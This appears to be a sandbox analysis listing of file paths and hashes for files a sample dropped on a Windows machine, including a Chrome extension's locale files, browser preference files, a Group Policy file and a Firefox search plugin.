SHA256 38af7c2222357b07b4e5f0292d334d66f048c12f1c85ca34215104baa75bc097
SHA512 e2e4fd47bb3625d050b530bc41df89501832d5a43e4bb21efea0102a6d04c130cd5b7a4e4cafdac99344eb271401c6e6f93440e55d77013695c1ab3bba1b4a89

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\agcghmjnenlfcjmnldooeaadankclolo\1.4_0\_locales\da\messages.json

MD5 372550a79e5a03aab3c5f03c792e6e9c
SHA1 a7d1e8166d49eab3edf66f5a046a80a43688c534
SHA256 d4de6ea622defe4a521915812a92d06d29065dacb889a9995a9e609bb02f2cfb
SHA512 4220dfce49f887bf9bf94bb3e42172ae0964cfb642343a967418ff7855c9c45455754ebf68c17f3d19fc7c6eb2c1b4725103bc55c9c56715941740897c19575f

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\agcghmjnenlfcjmnldooeaadankclolo\1.4_0\manifest.json

MD5 d2af1a809293cbf1394fe2e95da91d04
SHA1 e609d666f29b801cb971c3e767ec9a6230a49c19
SHA256 c9eae7c75c8f78a61c538cbedb7b7ea30be80cbc8be1ca7ff56a10982a3babc4
SHA512 73bff196a7145e3d8c31a0606201833f77f40c792611bf39d1a00d526f32cff2a2c8774b6ba040994c6182f5fb6375ae1379eec964936e1563f7d87884be9a73

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\agcghmjnenlfcjmnldooeaadankclolo\1.4_0\_locales\de\messages.json

MD5 3c8e1bfc792112e47e3c0327994cd6d1
SHA1 5c39df5dbafcad294f770b34130cd4895d762c1c
SHA256 14725b60e289582b990c6da9b4afcbef8063eb3414f9c6020023f4d2bac7bb1e
SHA512 ce7c707e15725ffb73c5915ee6b381ca82eda820ae5ec2353a4e7147de297f6367945b34010b4e4c41d68df92a4ccf9a2b5df877f89526ca6b674bae00cabe9e

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\agcghmjnenlfcjmnldooeaadankclolo\1.4_0\_locales\el\messages.json

MD5 177719dbe56d9a5f20a286197dee3a3b
SHA1 2d0f13a4aab956a2347ce09ad0f10a88ec283c00
SHA256 2e2ae3734b84565b2a6243fe4585dd6a0f5db54aae01fa86b6f522dd1ff55255
SHA512 ff10ae14ce5f7ed9b0612006730f783e1033304e511ccf9de68caeb48cc54e333c034f14cac63c3ea07c84a8f0f51c7f929b11d110913fa352562d43947798b5

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\agcghmjnenlfcjmnldooeaadankclolo\1.4_0\_locales\no\messages.json

MD5 43f1d4d731e2ab85a2fb653c63b4326e
SHA1 94f7d16dcf66186b6f40d73575c4a1942d5ca700
SHA256 1dcd3f41f085df98beea4609c2a3c07f2796e909c8bb342225d0c14a2e37d32a
SHA512 ec9473a8a06090167b727b923c745f58a59bd76fe2cf259d7b1603468c5bfe2eb3827e67c0247d9e5a6742ee06ac7558b8532bacc1519215d953ec529b1b3e43

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\agcghmjnenlfcjmnldooeaadankclolo\1.4_0\_locales\nl\messages.json

MD5 cb5f1996eceef89fb28c02b7eac74143
SHA1 df757b1cd3b24745d1d6fdb8538ceba1adf33e3e
SHA256 5895554b39c229627fdd2440f51ee87a6505056bde8e008746682738c42a307e
SHA512 667257911527d27d590b7940ed4ce687465d59ec8fca9d6aa06529a55a3e8139488745c13d77c92af8f94aa1908e5dcef941f0a23544d13529c66d38b25883c5

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\agcghmjnenlfcjmnldooeaadankclolo\1.4_0\_locales\mk\messages.json

MD5 616866b2924c40fda0a60b7988a1c564
SHA1 ca4750a620dac04eae8ff3c95df6fd92b35c62a7
SHA256 315e5ab70774f9b8247d3eae0a58e15bd3a32f8202e1f1b8ed90c2b2e633d865
SHA512 1fd19fd12c471f3b410fbe5dd39bee52795735985655840cb73ba2191a782c822253fe2e5d6fe7548d9e4f1d735845f07b5babed5141ca801ada60052a5fd8a3

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\agcghmjnenlfcjmnldooeaadankclolo\1.4_0\_locales\lv\messages.json

MD5 b676b28af1bc779eb07f2ad6fee4ec50
SHA1 36f12feab6b68357282fc4f9358d9e2a6510661a
SHA256 1ac599594e814cd69a4c7a8180d75fc8aad9c9af54e9411611b3c03a82947ef4
SHA512 d982861de053e3225af04377134013d596b1dc069d7faf27e087e19680b575af744a4d8bc8b32f858ed0e69a26527be3df1cd006da78695fbea3595c4259ee1b

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\agcghmjnenlfcjmnldooeaadankclolo\1.4_0\_locales\lt\messages.json

MD5 f46a2ab198f038019413c13590555275
SHA1 160b9817b28d3539396399aa02937d3e2f4796ac
SHA256 e01b215a6ef7446522b2701fc72888944d551627a331a6378a5a0b5c402fdc65
SHA512 5834ec16be2e3c7a6dc39d038d58a07adf5e842581fff80da92fe5b2c769e8e7db6f3dd69a90e5702535f5dfd6ab2787251dcfd0a0649149ab606f02c40e8c33

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\agcghmjnenlfcjmnldooeaadankclolo\1.4_0\_locales\it\messages.json

MD5 1c49f2f8875dcf0110675ead3c0c7930
SHA1 2124a6ac688001ba65f29df4467f3de9f40f67b2
SHA256 d6a6b8bb2706268726346d7cf12e2bc1e55dd9d730093de89d8962293b769cc0
SHA512 ab0da2797705a043fd4dfe5bd98c3d2a47d596ac9ac5edeaa709969615c4dab0514d83ae5a1ef226989c05e4603d614d0a22f70931c73216c36f6b493e5acc3f

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\agcghmjnenlfcjmnldooeaadankclolo\1.4_0\_locales\hu\messages.json

MD5 eec60f64bdaa23d9171e3b7667ecdcf9
SHA1 9b1a03ad7680516e083c010b8a2c6562f261b4bb
SHA256 b4b490e4fe6eb83b9e54f84c9f50e83866e78d0394bcb03353c6e61f76d1ac34
SHA512 c0dda2afcaae5e44eda8462dc8536c4507c1087fc54b18fb40c2894784776cab46b1d383c3113c0e106612efe71b951672deecc01b0447956e1dced93cca42b4

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\agcghmjnenlfcjmnldooeaadankclolo\1.4_0\_locales\fr\messages.json

MD5 6a9c08aa417b802029eb5e451dfb2ffa
SHA1 f54979659d56a77afab62780346813293ad7247b
SHA256 8f4ed00e79b8e990a32282eea13f8e1d0faa9cf8b21168643455b206e4e3d08c
SHA512 b5a504b5559d0e955a5a3cf2e0ae37a64cdad75aaa7c82d01757d4a2f541026dbfb1cb8373c932a0e003f1951e88e2f5a3fb7fc9992d67388f7184f00a8c1402

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\agcghmjnenlfcjmnldooeaadankclolo\1.4_0\_locales\fi\messages.json

MD5 0c79b671cd5e87d6420601c00171036c
SHA1 8c87227013aca9d5b9a3ed53a901b6173e14b34b
SHA256 6e13de5626ff0cb1c1f23b3dde137fcfc82f3420e88689b9e8d077ab356122ac
SHA512 bf956a7627feced1f6dba62fcfc0839a32573c38de71a420e748ce91e2a5e4f93dab67405174ba0d098ea7c1f66fb49b5a80d4f5d1ddc0fc2b08d033656d0e25

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\agcghmjnenlfcjmnldooeaadankclolo\1.4_0\_locales\et\messages.json

MD5 4ebb37531229417453ad13983b42863f
SHA1 8fe20e60d10ce6ce89b78be39d84e3f5210d8ecd
SHA256 ff9d868d50e291be9759e78316c062a0ec9bcbbb7c83b8e2af49a177dda96b22
SHA512 4b7987c2fb755bbc51d5a095be44457f0188b29964e9820156903d738398d2b7f2c95629a40abdca016e46cad22a99c35039ee784c01860dab44f4b7d02a5980

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\agcghmjnenlfcjmnldooeaadankclolo\1.4_0\_locales\en_TO\messages.json

MD5 b3aeaefccdeffa7678d18e9930a2a879
SHA1 e0ae8ab801f4ea31c6cc812ffa2510ee79bb2053
SHA256 a10e9e5f69586b82bbeb60f4d1722e99ea3f9c8eea1068ebd8c8518b307ef726
SHA512 133d56012824e6d20601392e8305a4726e07a24595be55f9a94cd5909918a12c91f25b4e9987455e1c88d2710af0f87bcc3449d5211a21429e2dfb1d881dfe86

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\agcghmjnenlfcjmnldooeaadankclolo\1.4_0\_locales\ru\messages.json

MD5 f0f33cfa8b275803c1c69cc2e8c58b98
SHA1 653b3e8ee7199e614b25128e7f28e14bf8fd02cb
SHA256 c28dbe7f5b5e95ecbeda2fbd517dab12e51810ae1e76079c2bcfd7738b7ae24c
SHA512 1ee8d9015ffb5c68ce322b69e8f90454239385133a1ed123e9d4f0841eec92012e0dbffe64c9f2ebb60fd5efc6e1525be0491a7433b0a5b184af3fb44e1a60c5

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\agcghmjnenlfcjmnldooeaadankclolo\1.4_0\_locales\uk\messages.json

MD5 01f32be832c8c43f900f626d6761bbaa
SHA1 3e397891d173d67daa01216f91bd35ba12f3f961
SHA256 1faeed8ec9ba451ee06b42999695771fd8a400dd6e3a699b755824830852e4a0
SHA512 9db085d75fb794c20df7060f603a7ac34481de3ae00f1260cc8e5a8a510234f383f71a85db48b6e2d8f2042646c08dd93a91a39ffe990f660f3cb9147fa4d42a

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\agcghmjnenlfcjmnldooeaadankclolo\1.4_0\_locales\tr\messages.json

MD5 e5c0575e52973721b39f356059298970
SHA1 b6d544b4fc20e564bd48c5a30a18f08d34377b13
SHA256 606c5c1d88157b4eed536e26d14f456ca05b3fdf5f30d1e0e30a52aaf2bbbf37
SHA512 dba47859af5e2462b6da0b397f333825704bd75a3453d3d86eee2a35a7c6535d290c240b0e6a85b9d472d0d952aa9cd48c6e3af7c79c02e0f09f6e9932c146dd

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\agcghmjnenlfcjmnldooeaadankclolo\1.4_0\_locales\sv\messages.json

MD5 66cf0340cf41d655e138bc23897291d3
SHA1 fff7a2a8b7b5e797b00078890ec8a9e0ddec503d
SHA256 d41042f78b7838b63ae141da4f4a7f67ea3f8e0fab66ea5111a1482867cf6e2f
SHA512 6411dea0ac928463317ad3ef418ac2f01e8621f64e024cb43fab52b132e08c7aa205ffc97e99f31b8dd824d19a403e7befbf7848e4421f031ed0a0b9b12e2c52

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\agcghmjnenlfcjmnldooeaadankclolo\1.4_0\_locales\sq\messages.json

MD5 a84d08782b2ff6f733b5b5c73ca3ce67
SHA1 c3ee1bbc80a21d5c6618b08df3618f60f4df8847
SHA256 22737aee22639043d8ab244e633a42e37e6ac7cccd2e4103b9f8fccfbcecd0d6
SHA512 436b6bca82272f918341bf2ab673a101c106e048859a4cd204bf83313588d2e9db30c4b3a8b7053544305b3f7a6b905a6c35c226923eb93ca3d55e8a128fc1f5

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\agcghmjnenlfcjmnldooeaadankclolo\1.4_0\_locales\sl\messages.json

MD5 816d952fe0f9413e294b84829d5a6b96
SHA1 cfd774e6afe6e04158cc95bab0857a5e52251581
SHA256 5d12f8f83c157b62c22ccf5d66789855f9e08f63ca19890318ed3c6a9501538f
SHA512 dccf1e19401e2a7b1ce2f81d221da78b939e3912455a145baf4f4867e1e9c8c39136a70f7cd34d5c9f2cd22e87223a9246803b4c853f4736cb050554a56b1b83

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\agcghmjnenlfcjmnldooeaadankclolo\1.4_0\_locales\sk\messages.json

MD5 b1eb0ab05de1272667be2558dea84951
SHA1 dfa723146cba15c190cf19fb3d7c84ffa12cd302
SHA256 ee50762de69cb198e12982c1871ee4e7aaf1588b2dde683fe3946825c95adc73
SHA512 af110a7bc225c656e0a97c36555d67f3d0fb5884b8e2c9ab7565e5faa7987781fbf42e8020e30771b997aaba05540a2fa2eeb6c31798d275435c85e69014f546

C:\Windows\System32\GroupPolicy\Machine\Registry.pol

MD5 991434af42831070a4e5bcf3e2d1db0e
SHA1 f1a8771fa40d7b6b853aef1b4fcc1db3a3311160
SHA256 43df82bdaab7f5bd4cba597652b7712172c60c9cda11198d11e2d97d72c8acf7
SHA512 0566583e82ef64524b335b111f5b1fd8b44b394c8563af3f74f96fee20820008ccf171075bc083a82e581811d887e1a57e4f8dc528f9fdbe96b8acb45f7cbfa0

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Secure Preferences

MD5 ea4e3231f4f8400bf547e2e3c8e46def
SHA1 2b736248fbc4264fc51023565449ce2058d9ee0e
SHA256 0c3125a740e08fc4c09cdcc881b177bd4dc2efae740de95ace708e7104de6f03
SHA512 2fc5ee2c4d7ca53e9088170445f5d1a18bf15bcc5b194843b550db50bb1517643801be0d47d9b634f6d826ca21cb050872499f47bdf82f3736a7eac0b76e6a17

C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\n9vxbo99.default-release\searchplugins\cdnsearch.xml

MD5 2869f887319d49175ff94ec01e707508
SHA1 e9504ad5c1bcf31a2842ca2281fe993d220af4b8
SHA256 49dd61e19d4541f1e695b66847d0bf99bc08952ba41b33a69c2e297dfa282d15
SHA512 63673c1ede47fda14dea78483c6319132a849db3b35953e43704aa49cfb6d14e42d74e0eaf93f4cdb7632c85f368d484ac111687127d2b87a3e264949085c76b

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Secure Preferences

MD5 2ca4ed35244525fbca5616b97f62ca98
SHA1 56f9a9abdd5a119ba298cbc05315eb72cafc7227
SHA256 71ecdb7f14aadd1f8564d25f29aa5d8ccee9b9c60a917150e1214a59d735c661
SHA512 6bca5a1ff9d155d41feaabe45f6df07193522a8423fb65887dae4480f707c0f59e436882c87d8811f5dfdc8bdeae45d4eed73b3497d948d26e54a0f22868280f

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences

MD5 0a571afbfe20d3f0768ed0a034dbb07b
SHA1 e2b179328e7b840d6b9a71ed3b49128a4fc55733
SHA256 c8a5d5469f75f147bd0ff34f965941ae492471c83b5e112aa5a28cea6d566fec
SHA512 aeedc9825d506768164b242e4d7f27cc1d74f51de4524b44e30117bdf4265477e100a7a5b99912ea23dddb50ed487f757364d410875b60d4a0ab8da4a79816bf

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Preferences

MD5 f2b9bf4bd72692930882930eeae01bb5
SHA1 183851fcf190c885b59d21e9f715eed344a3abd7
SHA256 77b717480b3224f371b99831002a0e43241fb0ea0e9af9c6f35d588eaa1a3a42
SHA512 7a71d7e96de62fe08559e8884338d9680f705fefbced0ebb16748a0c17872377e1ec1325d6bff6e2741d0d5864b9e73161023f610e16989cc07f50f88d2b3653